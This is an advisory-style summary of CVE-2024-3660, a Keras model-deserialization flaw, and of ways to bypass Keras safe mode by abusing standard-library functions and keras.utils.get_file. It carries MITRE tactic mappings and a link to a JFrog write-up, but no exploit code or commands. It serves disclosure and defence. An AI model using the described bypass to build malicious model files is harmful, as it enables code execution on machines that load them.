A critical deserialization vulnerability (CVE-2024-3660) in TensorFlow’s Keras library allows attackers to run arbitrary code through malicious Keras model files. Although Keras introduced a safe mode to prevent the execution of harmful Lambda layers, the exploitation methods still exist. This ongoing security risk emphasizes the need for improved sandboxing and security measures for machine learning frameworks. Affected: Keras, TensorFlow, Machine Learning frameworks
Keypoints :
- Vulnerability identified as CVE-2024-3660 allows arbitrary code execution through deserialization.
- Malicious Keras model files can contain embedded executable code within Lambda layers.
- Keras v2.13 introduced a safe mode to restrict Lambda deserialization and prevent exploitation.
- While safe mode blocks some exploits, vulnerabilities still persist in the Keras library.
- Functions from standard libraries can be abused to execute arbitrary commands post-deserialization.
- Keras v3.9 attempts to restrict function loading to Keras modules but retains exploitable functions.
- Regular security evaluation and scanning of machine learning models is crucial for protection.
MITRE Techniques :
- TA0002: Execution – Exploiting deserialized Lambda layers in Keras models to execute arbitrary code.
- TA0007: Discovery – Using the keras.utils.get_file function to download files from unknown sources on the victim’s machine.
Indicator of Compromise :
- No IoC Found
Full Story: https://jfrog.com/blog/keras-safe_mode-bypass-vulnerability/